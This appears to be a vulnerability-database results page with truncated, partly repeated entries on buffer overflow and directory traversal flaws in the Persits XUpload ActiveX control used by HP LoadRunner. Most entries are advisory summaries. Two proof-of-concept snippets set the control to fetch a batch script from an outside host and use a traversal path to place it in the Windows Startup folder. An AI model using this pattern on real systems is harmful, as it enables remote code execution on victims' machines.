Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)

$Id: hploadrunneraddfile.rb 9262 2010-05-09 17:45:00Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

HP LoadRunner XUpload ActiveX control MakeHttpRequest file download

Added: 10/21/2009 CVE: CVE-2009-3693 BID: 36550 Background HP LoadRunner is a software performance testing solution. HP LoadRunner includes the XUpload.ocx ActiveX control for performing file exchanges. Problem The MakeHttpRequest method in the XUpload.ocx ActiveX control can be used to download...

HP LoadRunner XUpload ActiveX control MakeHttpRequest file download

Added: 10/21/2009 CVE: CVE-2009-3693 BID: 36550 Background HP LoadRunner is a software performance testing solution. HP LoadRunner includes the XUpload.ocx ActiveX control for performing file exchanges. Problem The MakeHttpRequest method in the XUpload.ocx ActiveX control can be used to download...

HP LoadRunner XUpload ActiveX control MakeHttpRequest file download

Added: 10/21/2009 CVE: CVE-2009-3693 BID: 36550 Background HP LoadRunner is a software performance testing solution. HP LoadRunner includes the XUpload.ocx ActiveX control for performing file exchanges. Problem The MakeHttpRequest method in the XUpload.ocx ActiveX control can be used to download...

CVE-2009-3693

CVE-2009-3693 involves a directory traversal in Persits.XUpload.2 ActiveX control (XUpload.ocx) shipped with HP LoadRunner 9.5. The flaw arises in the MakeHttpRequest method, where sequences like "..\" can cause arbitrary files to be created on the target. Public details describe this as a write-...

HP LoadRunner 9.5 - Remote file creation (PoC)

' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\..\..\Documents and Settings\All...

HP LoadRunner 9.5 - Remote file creation (PoC)

HP LoadRunner 9.5 - Remote file creation PoC ' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params=""...

HP LoadRunner 9.5 remote file creation PoC

Exploit for unknown platform in category dos / poc ========================================== HP LoadRunner 9.5 remote file creation PoC ========================================== Title: HP LoadRunner 9.5 remote file creation PoC CVE-ID: OSVDB-ID: Author: Pyrokinesis Published: 2009-09-29 Verifie...

Persits Software XUpload AddFile()方式远程栈溢出漏洞

BUGTRAQ ID: 27456 XUpload是功能强大的客户端上传ActiveX控件，允许用户同时上传多个文件。 XUpload的ActiveX控件实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。 XUpload的Persits.XUpload.2 ActiveX控件（XUpload.ocx）没有正确地处理传送给AddFile方式的输入参数，如果用户受骗访问了恶意网页并向该方式传送了超长字符串参数的话，就可能触发栈溢出，导致执行任意指令。 Persits XUpload 3.0.0.4 Persits XUpload 2.1.0.1 厂商补丁： Persits...

CVE-2008-0492

CVE-2008-0492 affects the Persits XUpload ActiveX control (XUpload.ocx 3.0.0.4 and earlier). A stack-based buffer overflow is triggered by a long argument to the AddFile method, allowing remote code execution. The CVSS notes a network vector, no authentication, and partial impact to confidentiali...

CVE-2008-0492

Stack-based buffer overflow in the Persits.XUpload.2 ActiveX control in XUpload.ocx 3.0.0.4 and earlier in Persits XUpload 3.0 allows remote attackers to execute arbitrary code via a long argument to the AddFile method. NOTE: some of these details are obtained from third party information...

CVE-2007-6530

Buffer overflow in the XUpload.ocx ActiveX control in Persits Software XUpload 2.1.0.1, and probably other versions before 3.0, as used by HP Mercury LoadRunner and Groove Virtual Office, allows remote attackers to execute arbitrary code via a long argument to the AddFolder function...

Buffer overflow

Buffer overflow in the XUpload.ocx ActiveX control in Persits Software XUpload 2.1.0.1, and probably other versions before 3.0, as used by HP Mercury LoadRunner and Groove Virtual Office, allows remote attackers to execute arbitrary code via a long argument to the AddFolder function...

CVE-2007-6530

Buffer overflow in the XUpload.ocx ActiveX control in Persits Software XUpload 2.1.0.1, and probably other versions before 3.0, as used by HP Mercury LoadRunner and Groove Virtual Office, allows remote attackers to execute arbitrary code via a long argument to the AddFolder function...

[Full-disclosure] Persits Software XUpload.ocx Buffer Overflow

There is a buffer overflow in the AddFolder method of the Persists Software XUpload control, version 2.1.0.1. This object is marked safe for scripting. Version 3.0latest is not vulnerablethrows an error if the parameter is more than 256 characters, I have not tested any other versions. A quick...